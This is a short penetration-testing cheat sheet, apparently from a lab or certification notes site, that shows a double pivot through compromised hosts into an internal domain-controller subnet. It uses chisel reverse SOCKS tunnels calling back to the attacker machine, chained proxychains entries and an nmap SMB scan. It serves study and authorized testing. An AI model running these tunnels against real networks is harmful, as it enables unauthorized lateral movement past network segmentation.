Double Pivot

Shoutout Rapunzel3000 for this one

Kali -> NIX01(DMZ) -> DC01 -> DC02

  • NIX01 and DC01 - 172.16.1.0/24

  • DC02 - 172.16.2.0/24

On our machine

./chisel_linux server --socks5 -p 9001 --reverse

Edit proxychains config and comment out socks 127.0.0.1 9050

socks5 127.0.0.1 9999
socks5 127.0.0.1 8888

On NIX01

./chisel client 10.10.14.10:9001 R:9999:socks
./chisel server  -p 9002 --reverse --socks5

On DC01

chisel.exe client 172.16.1.100:9002 R:8888:socks

Scan

proxychains nmap -p445 -Pn -v 172.16.2.5
PreviousSSHuttleNextGood to Know

Last updated